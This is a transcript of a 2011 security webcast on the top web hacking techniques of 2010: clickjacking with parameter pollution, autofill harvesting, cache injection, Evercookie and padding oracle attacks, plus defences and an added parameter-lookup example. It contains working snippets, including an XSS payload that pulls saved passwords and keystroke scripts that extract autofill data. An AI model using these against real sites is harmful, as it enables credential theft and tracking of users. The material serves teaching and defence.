Top Ten Web Hacking Techniques (2010)

Jeremiah Grossman, Founder & Chief Technology Officer. Webcast, 03.17.2011. © 2011 WhiteHat Security, Inc. Web Hacking 2010: top ten techniques.


Posted on 13-May-2015


DESCRIPTION

Video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip

Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users. The top attacks in 2010 include:

• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding

Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.

TRANSCRIPT

Page 1: Top Ten Web Hacking Techniques (2010)

Jeremiah Grossman, Founder & Chief Technology Officer

Webcast, 03.17.2011

© 2011 WhiteHat Security, Inc.

Web Hacking 2010: top ten techniques

Page 2: Top Ten Web Hacking Techniques (2010)


Jeremiah Grossman

• WhiteHat Security Founder & CTO

• Technology R&D and industry evangelist

• InfoWorld's CTO Top 25 for 2007

• Co-founder of the Web Application Security Consortium

• Co-author: Cross-Site Scripting Attacks

• Former Yahoo! information security officer


Page 3: Top Ten Web Hacking Techniques (2010)
Page 4: Top Ten Web Hacking Techniques (2010)


• 400+ enterprise customers: start-ups to Fortune 500

• Flagship offering "WhiteHat Sentinel Service": 1000's of assessments performed annually

• Recognized leader in website security: quoted thousands of times by the mainstream press

Page 5: Top Ten Web Hacking Techniques (2010)


“Every year the Web security community produces a stunning amount of new hacking techniques published in various white papers, blog posts, magazine articles, mailing list emails, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and so on. Beyond individual vulnerability instances with CVE numbers or system compromises, we're talking about brand new and creative methods of Web-based attack.”

About the Top Ten

Page 6: Top Ten Web Hacking Techniques (2010)


New Techniques

2009 (80): Creating a rogue CA certificate

2008 (70): GIFAR (GIF + JAR)

2007 (83): XSS Vulnerabilities in Common Shockwave Flash Files

2006 (65): Web Browser Intranet Hacking / Port Scanning

Page 7: Top Ten Web Hacking Techniques (2010)

2010: 69 new techniques

http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html

1) 'Padding Oracle' Crypto Attack
2) Evercookie
3) Hacking Auto-Complete
4) Attacking HTTPS with Cache Injection
5) Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
6) Universal XSS in IE8
7) HTTP POST DoS
8) JavaSnoop
9) CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
10) Java Applet DNS Rebinding


Page 8: Top Ten Web Hacking Techniques (2010)

Clickjacking is when an attacker invisibly hovers an object (button, link, etc.) below a user's mouse. When the user clicks on something they visually see, they're instead really clicking on something the attacker wanted them to. HTTP Parameter Pollution is where an attacker submits multiple input parameters (query string, post data, cookies, etc.) with the same name. Upon receipt applications may react in unexpected ways and open up avenues of server-side and client-side exploitation. By cleverly leveraging these two former Top Ten attacks, CSRF attacks can be carried out against a user even when recommended token defenses are in use.

Bypassing CSRF with Clickjacking and HTTP Parameter Pollution

http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html

Lavakumar Kuppan (@lavakumark)

Page 9: Top Ten Web Hacking Techniques (2010)


Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue.

Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to.

What could the bad guy do with that ability?

Clickjacking (Top Ten 2009)

Page 10: Top Ten Web Hacking Techniques (2010)

<iframe src="http://victim/page.html" scrolling="no" frameborder="0"
        style="opacity:.1; filter:alpha(opacity=10); -moz-opacity:.1;">
</iframe>

HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.

Hover Invisible IFRAMEs


Page 11: Top Ten Web Hacking Techniques (2010)


If an attacker submits multiple input parameters (query string, post data, cookies, etc.) of the same name, the application may react in unexpected ways and open up new avenues of server-side and client-side exploitation.

HTTP Parameter Pollution (HPP) - Top Ten 2009

GET /foo?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*

POST /foo HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Accept: */*

par1=val1&par1=val2

POST /index.aspx?par1=val1&par1=val2 HTTP/1.1
User-Agent: Mozilla/5.0
Host: Host
Cookie: par1=val3; par1=val4
Content-Length: 19

par1=val5&par1=val6

Page 13: Top Ten Web Hacking Techniques (2010)


Page 14: Top Ten Web Hacking Techniques (2010)


Page 15: Top Ten Web Hacking Techniques (2010)


Page 16: Top Ten Web Hacking Techniques (2010)

private void executeBackendRequest(HTTPRequest request) {
    String amount = request.getParameter("amount");
    String beneficiary = request.getParameter("recipient");
    // both values are concatenated, unencoded, into the backend request body
    HttpRequest("http://backend.com/servlet/actions", "POST",
        "action=transfer&amount=" + amount + "&recipient=" + beneficiary);
}

Malicious URL: http://target.com/page?amount=1000&recipient=Jeremiah%26action%3dwithdraw

Translates to: action=transfer&amount=1000&recipient=Jeremiah&action=withdraw

It is possible the attack could work if proper authorization controls are not in place and the application uses the last occurrence of the action parameter (IBM Lotus Domino, PHP / Apache, etc.)

Simple parameter injection


Page 17: Top Ten Web Hacking Techniques (2010)


Example Scenario: http://example/updateEmail.jsp

Client-Side

<form method="POST">
  <input type="text" name="email" value="">
  <input type="hidden" name="csrf-token" value="a0a0a0a0a0a">
</form>

Server-Side

if (req.parameter("email").isSet() && req.parameter("csrf-token").isValid()) {
    // process the form and update the email ID
} else {
    // display an empty form to the user (CSRF token included)
}

Page 18: Top Ten Web Hacking Techniques (2010)


Bringing it all together

<iframe src="http://example/[email protected]">

The HTTP request is sent by the user-submitted form via Clickjacking. The form was not filled out by the victim, meaning the email parameter in the POST body is blank, while the QueryString contains the attacker-entered value for the 'email' parameter.

POST /[email protected] HTTP/1.1
Host: www.example.com

email=&csrf-token=a0a0a0a0a0

When the server side JSP code calls req.parameter("email"), the value that is returned is the one in the QueryString (HPP first occurrence) and not the POST body. Since this value can be controlled by the attacker, he can trick the victim into updating his account with the attacker's mail ID.
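As an added example (not code from the slides or from the researchers they cite), the Node.js snippet below collects every occurrence of a parameter across the query string, POST body and cookies from the HPP slides, reproduces the first-occurrence lookup that the updateEmail.jsp walkthrough relies on, and contrasts it with a strict, source-aware lookup that refuses the polluted request. The request objects, field names and the attacker address are constructed for the demo.

```javascript
// Added example, not from the slides. Request objects, field names and the attacker's
// address are constructed for this demo.

// Parse "par1=val3; par1=val4" into [["par1","val3"],["par1","val4"]], keeping duplicates.
function parseCookies(header) {
  const pairs = [];
  for (const part of header.split(';')) {
    const [name, ...rest] = part.trim().split('=');
    if (name) pairs.push([name, rest.join('=')]);
  }
  return pairs;
}

// Every occurrence of every parameter: name -> [{source, value}], query before body before cookie.
function collectParams(req) {
  const occurrences = new Map();
  const add = (source, name, value) => {
    if (!occurrences.has(name)) occurrences.set(name, []);
    occurrences.get(name).push({ source, value });
  };
  const qpos = req.url.indexOf('?');
  for (const [k, v] of new URLSearchParams(qpos >= 0 ? req.url.slice(qpos + 1) : '')) add('query', k, v);
  for (const [k, v] of new URLSearchParams(req.body || '')) add('body', k, v);
  for (const [k, v] of parseCookies(req.headers.cookie || '')) add('cookie', k, v);
  return occurrences;
}

// Lenient lookup, like req.parameter("email") on slide 18: first occurrence wins, so the
// query string shadows the POST body.
function lenientParam(req, name) {
  const hits = collectParams(req).get(name);
  return hits ? hits[0].value : undefined;
}

// Strict lookup: exactly one occurrence, and only in the source the handler expects.
function strictParam(req, name, expectedSource) {
  const hits = collectParams(req).get(name) || [];
  if (hits.length !== 1 || hits[0].source !== expectedSource) {
    return { ok: false, reason: `${name}: ${hits.length} occurrence(s) in [${hits.map((h) => h.source)}]` };
  }
  return { ok: true, value: hits[0].value };
}

const VALID_TOKEN = 'a0a0a0a0a0'; // the victim's token from slide 18

// Modelled on the slide's JSP (isSet() && isValid()) with first-occurrence lookups.
function updateEmailLenient(req) {
  const email = lenientParam(req, 'email');
  const token = lenientParam(req, 'csrf-token');
  return email && token === VALID_TOKEN ? { updated: email } : { updated: null };
}

// Same handler with strict lookups: both fields must arrive once each, in the POST body.
function updateEmailStrict(req) {
  const email = strictParam(req, 'email', 'body');
  const token = strictParam(req, 'csrf-token', 'body');
  const ok = email.ok && token.ok && email.value !== '' && token.value === VALID_TOKEN;
  return { updated: ok ? email.value : null };
}

// Constructed request mirroring slide 18: the attacker's address in the query string, the
// clickjacked form's empty email field and the victim's valid token in the POST body.
const clickjackedPost = {
  method: 'POST',
  url: '/updateEmail.jsp?email=attacker%40example.com',
  headers: { host: 'www.example.com', cookie: '' },
  body: 'email=&csrf-token=a0a0a0a0a0',
};
```

The strict lookup also reports where the extra occurrences came from, which is the signal worth logging when hunting for HPP probes against a form handler.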

Page 19: Top Ten Web Hacking Techniques (2010)

No matter what type of encryption is used to defend a network, sooner or later the password, key, or certificate needs to be stored. If an attacker is able to tamper with the storage mechanism, even the strongest encryption mechanism can fail. The researchers demonstrated how to attack storage mechanisms by tampering with SSL sessions and breaking into WiFi networks using WPA. They also showed how to exploit SSL warning inconsistencies and caching mechanisms to trick the user into accepting a bad cert and steal their username & password.

Attacking HTTPS with Cache Injection

http://www.youtube.com/watch?v=bt0Qh9c59_c
http://elie.im/talks/bad-memories

Elie Bursztein (@ELIE), Baptiste Gourdin (@bapt1ste), Dan Boneh

Page 20: Top Ten Web Hacking Techniques (2010)

Public Wifi (coffee shops, airplanes, corp guest networks)

[Diagram: Victims, Bad Guy, HTTP / Airpwn, Internet]

http://www.bindshell.net/tools/beef/
http://airpwn.sourceforge.net/Airpwn.html

• Victim(s) located on a RFC 1918 network with a Bad Guy
• Bad Guy may take the opportunity to read victim's Web mail, steal creds, etc.
• Bad Guy man-in-the-middles HTTP (Airpwn) to inject IFRAMEs to RFC-1918 IPs
• MitM IFRAMEs to include JavaScript malware (BeEF). Or ...
• Inject JavaScript malware into popular Web widget URLs. (Ad servers, counters, etc.)
• Cache content in the browser for a really long time, beyond current session!

RFC1918 Caching Security - (Top Ten 2009)

Page 21: Top Ten Web Hacking Techniques (2010)


Situation

• 43% of the Alexa top 100,000 use external javascript libraries

• Injecting a malicious javascript library into the browser cache allows the attacker to compromise a website protected by SSL

• The malicious library stays in the cache until the user clears it. Moving to a "safe" location doesn't help

Page 22: Top Ten Web Hacking Techniques (2010)


Impact

• One poisoned injection leads to multiple breaches

• Multiple websites share the same external library, such as Google Analytics

• Injecting a malicious version of one of these shared libraries allows the attacker to target all the websites that use it

Page 23: Top Ten Web Hacking Techniques (2010)


Browser Defense -- sort of

• The only defense against cache injection is the SSL warning displayed by the browser when a bad certificate is supplied

• Corner cases allow an attacker to alter the way SSL certificate warnings are displayed

• These alterations make the caching attack efficient, as the user is more likely to click through the tampered warning

Page 24: Top Ten Web Hacking Techniques (2010)


Video Demo

• The following demos show how caching injection attacks work against Internet Explorer 8 and Firefox 3.6

• These demos were done in real time against real sites with their real certificates

Page 25: Top Ten Web Hacking Techniques (2010)

This research encompasses a set of techniques where a malicious website may surreptitiously obtain its visitors' names, job titles, workplaces, physical addresses, telephone numbers, email addresses, usernames, passwords, search terms, social security numbers, credit card numbers, and on and on, by simulating JavaScript keystroke events against the Web browser's HTML form auto-complete / autofill functionality.

Hacking Auto-Complete

http://jeremiahgrossman.blogspot.com/2010/08/breaking-browsers-hacking-auto-complete.html
http://jeremiahgrossman.blogspot.com/2010/07/i-know-who-your-name-where-you-work-and.html
http://jeremiahgrossman.blogspot.com/2010/09/safari-autofill-hack-lives.html
http://jeremiahgrossman.blogspot.com/2010/07/in-firefox-we-cant-read-auto-complete.html

Jeremiah Grossman (@jeremiahg)

Page 26: Top Ten Web Hacking Techniques (2010)

I want to know your name, who you work for, where you live, your email address, etc., right at the moment you visit a website. Even if you've never been there before, let alone entered information.


Page 27: Top Ten Web Hacking Techniques (2010)

Safari Address Book Autofill (enabled by default)

<form>
  <input type="text" name="name">
  <input type="text" name="company">
  <input type="text" name="city">
  <input type="text" name="state">
  <input type="text" name="country">
  <input type="text" name="email">
</form>


Page 28: Top Ten Web Hacking Techniques (2010)

Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.


Page 29: Top Ten Web Hacking Techniques (2010)


Demo

Step 1) Dynamically create input fields with the pre-set attribute names.

Step 2) Cycle through the alphabet initiating text events until a form value populates.

Step 3) Profit! -- Steal data with JavaScript.

var event = document.createEvent('TextEvent');
event.initTextEvent('textInput', 1, 1, null, char);

input.value = "";
input.selectionStart = 0;
input.selectionEnd = 0;
input.focus();
input.dispatchEvent(event);

setTimeout(function() {
  if (input.value.length > 1) {
    // capture the value
  }
}, 500);

Safari v4 / v5

*transparency is even more fun!*

Page 30: Top Ten Web Hacking Techniques (2010)

Internet Explorer 8 = SAFE


Page 31: Top Ten Web Hacking Techniques (2010)

AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.

<input type="text" name="email">


Page 32: Top Ten Web Hacking Techniques (2010)

// hit down arrow an incrementing number of times.
// separate with time to allow the GUI to keep pace
for (var i = 1; i <= downs; i++) {
  time += 30; // time padding
  keyStroke(this, 40, time); // down button
}
time += 15; // time padding
keyStroke(this, 13, time); // enter button

// initiate keystroke on a given object
function keyStroke(obj, code, t) {
  // create new event and fire
  var e = document.createEventObject();
  e.keyCode = code;
  setTimeout(function() { obj.fireEvent("onkeydown", e); }, t);
} // end keyStroke

Security Basis, and an Internet Explorer data stealer
http://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.html
Andrea Giammarchi, Ajaxian Staff

DEMO - Down, Down, Enter


Page 33: Top Ten Web Hacking Techniques (2010)

Search terms
Credit card numbers and CCVs
Aliases
Contact information
Answers to secret questions
Usernames
Email addresses
...


Page 34: Top Ten Web Hacking Techniques (2010)

AutoComplete is NOT enabled by default, but Internet Explorer asks the user if they would like to enable the feature after filling out a non-password form.


Page 35: Top Ten Web Hacking Techniques (2010)

Have the email address, but need the password


Page 36: Top Ten Web Hacking Techniques (2010)

Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.

<form method="post" action="/">
  E-Mail: <input type="text" name="email"><br />
  Password: <input type="password" name="pass"><br />
  <input type="submit" value="Login">
</form>

Saving Passwords


Page 37: Top Ten Web Hacking Techniques (2010)

function stealCreds() {
  var string = "E-Mail: " + document.getElementById("u").value;
  string += "\nPassword: " + document.getElementById("p").value;
  return string;
}

document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');

setTimeout('alert(stealCreds())', 2000);

If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which triggers the browser's password auto-complete feature. Since the payload is on the same domain, the username / password can be stolen.

DEMO

Page 38: Top Ten Web Hacking Techniques (2010)

Disable Auto-Complete in the Web browser

Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)

NoScript (Firefox Extension), 1Password, etc.

<form autocomplete="off">
  <input type="text" autocomplete="off" />
</form>

What to do...


Page 39: Top Ten Web Hacking Techniques (2010)

http://samy.pl/evercookie/

Samy Kamkar (@samykamkar)

Evercookie is a JavaScript API that produces extremely persistent cookies in a browser. Its goal is to identify a client even after they've removed standard cookies, Flash cookies (Local Shared Objects or LSOs), and others. Evercookie accomplishes this by storing the cookie data in several types of storage mechanisms that are available in the local browser. Additionally, if evercookie finds that the user has removed any of the types of cookies in question, it recreates them using each mechanism available.

Evercookie


Page 40: Top Ten Web Hacking Techniques (2010)


Page 41: Top Ten Web Hacking Techniques (2010)


Evercookies

1) Standard HTTP Cookies
2) Flash Cookies (LSOs)
3) Silverlight Isolated Storage
4) Storing cookies in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas tag to read pixels (cookies) back out
5) Storing cookies in Web History
6) window.name caching
7) Internet Explorer userData storage
8) Storing cookies in Web cache
9) Storing cookies in HTTP ETags
10) HTML5 Session Storage
11) HTML5 Local Storage
12) HTML5 Global Storage
13) HTML5 Database Storage via SQLite

Page 42: Top Ten Web Hacking Techniques (2010)


The API

• Persistent cookies via Javascript API
• Recreates after deletion
• Combines different storage mechanisms
• Easy to use!

var ec = new evercookie();

ec.set("uniqueid", "31337"); // set uniqueid = 31337

// get our evercookie data back
ec.get("uniqueid", function(val) { alert("ID is " + val); });

Page 43: Top Ten Web Hacking Techniques (2010)


PNGs Cache

Cookie stored in RGB values of auto-generated, force-cached PNGs using HTML5 Canvas Tag to read pixels back out

Pixel 0x0 = 0x4f5741 ("OWA")
Pixel 0x1 = 0x535000 ("SP\0")

Page 44: Top Ten Web Hacking Techniques (2010)


Killing Evercookies (Video)

1) Open a new tab, then close all other windows and tabs.
2) Delete Silverlight Isolated Storage
   • Go to http://www.silverlight.net/
   • Right click the Silverlight application (any app will do)
   • Silverlight Preferences > Application Storage > Delete all...
   • Click "Yes"
   • Optionally disable "Enable application storage"
3) Delete Flash Local Shared Objects (LSO)
   • Go to the Flash "Website Storage Settings panel"
   • Click "Delete all sites"
   • Click "Confirm"
4) Clear Browsing Data
   • Wrench > Tools > Clear Browsing Data...
   • Select all options
   • Clear data from this period: Everything
   • Click "Clear Browsing data"

http://singe.za.net/blog/archives/1014-Killing-the-Evercookie.html
http://jeremiahgrossman.blogspot.com/2010/10/killing-evercookie-google-chrome-wo.html

Page 45: Top Ten Web Hacking Techniques (2010)


Other Protections

• Nevercookie - The evercookie killer: Firefox plugin to extend Firefox's Private Browsing
  http://nevercookie.anonymizer.com/

•Use a virtual machine. (On your neighbor’s WiFi Network)

Page 46: Top Ten Web Hacking Techniques (2010)


Other Worries...

• System/browser timing

• GPU timing via plugins/accelerators (w/Flash)

• MAC address accessible via Java or ActiveX!

Page 47: Top Ten Web Hacking Techniques (2010)

In 2002 a powerful side-channel attack, the 'padding oracle' (NOT THE DATABASE!), was described targeting AES CBC-mode encryption with PKCS#5 padding. Given an oracle which, on receipt of a ciphertext, decrypts it and replies whether the padding is correct, the attack shows how to use that oracle to decrypt data without knowing the encryption key. The new techniques allow attackers to use a 'padding oracle' to decrypt and encrypt messages of any length without knowing the secret key, and to exploit popular web development frameworks including ASP.NET.

'Padding Oracle' Crypto Attack

http://usenix.org/events/woot10/tech/full_papers/Rizzo.pdf
http://netifera.com/research/
http://www.gdssecurity.com/l/b/2010/09/14/automated-padding-oracle-attacks-with-padbuster/
http://www.youtube.com/watch?v=yghiC_U2RaM
http://threatpost.com/en_us/blogs/padding-oracle-crypto-attack-affects-millions-aspnet-apps-091310

Juliano Rizzo (@julianor), Thai Duong (@thaidn)

Page 49: Top Ten Web Hacking Techniques (2010)


An application uses a query string parameter to pass an encrypted username, company id, and role id of a user. The parameter is encrypted using CBC mode, and each value uses a unique initialization vector (IV) pre-pended to the ciphertext. When the application is sent an encrypted value, it responds in one of three ways:

1) Valid ciphertext, properly padded and valid data (200 OK)
2) Invalid ciphertext, improper padding (500 Internal Server Error)
3) Valid ciphertext, properly padded and invalid data (200 OK - custom error)

Padding Oracle Attack Basics

User’s name (BRIAN), company id (12), and role id (2). The value, in plaintext, can be represented as BRIAN;12;2;

http://site/app.jsp?UID=7B216A634951170FF851D6CC68FC9537858795A28ED4AAC6

Page 50: Top Ten Web Hacking Techniques (2010)


Page 51: Top Ten Web Hacking Techniques (2010)


Encryption

Decryption

Page 52: Top Ten Web Hacking Techniques (2010)


First block of ciphertext pre-pended with an IV of all NULL values.

Request: http://site/app.jsp?UID=0000000000000000F851D6CC68FC9537
Response: 500 - Internal Server Error

Page 53: Top Ten Web Hacking Techniques (2010)


Last byte of the initialization vector incremented by one.

Request: http://app/home.jsp?UID=0000000000000001F851D6CC68FC9537
Response: 500 - Internal Server Error

Page 54: Top Ten Web Hacking Techniques (2010)


Incrementing the last byte in the IV up to FF will produce a valid padding sequence for a single byte of padding (0x01). Only one value will produce the correct padding byte and have a different response than the other 255.

Request: http://site/app?UID=000000000000003CF851D6CC68FC9537
Response: 200 OK

If [Intermediary Byte] ^ 0x3C == 0x01,
then [Intermediary Byte] == 0x3C ^ 0x01,
so [Intermediary Byte] == 0x3D

Page 55: Top Ten Web Hacking Techniques (2010)


To crack the 7th byte, the 7th and 8th bytes must equal 0x02 for valid padding. Since we already know that the last intermediary value byte is 0x3D, we can update the 8th IV byte to 0x3F (which will produce 0x02) and then focus on brute forcing the 7th byte (starting with 0x00 and working our way up through 0xFF).

Page 56: Top Ten Web Hacking Techniques (2010)


"The first stage of the attack takes a few thousand requests, but once it succeeds and the attacker gets the secret keys, it's totally stealthy. The cryptographic knowledge required is very basic." - Juliano Rizzo

Work backwards through the entire block until every byte of the intermediary value is cracked, uncovering the decrypted value one byte at a time. The final byte is cracked using an IV that produces an entire block of just padding (0x08).

Page 57: Top Ten Web Hacking Techniques (2010)


<VIDEO>

"It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,"

-Thai Duong

Page 58: Top Ten Web Hacking Techniques (2010)


Vulnerable Frameworks
ASP.Net, CAPTCHAs, JavaServer Faces, OWASP ESAPI, Ruby On Rails, etc.

Prevention
• Encrypt-then-MAC (sign) and validate-then-decrypt
• Patch!

Impact & Prevention

Page 59: Top Ten Web Hacking Techniques (2010)


• Encryption attacks took the top spot for the 2nd year in a row.

• Web browser privacy? Web browser security? Not so much.

• "Top Ten" attacks from previous years are being improved.

• Several attack techniques from previous years are now actively being used maliciously in the wild.

What have we learned?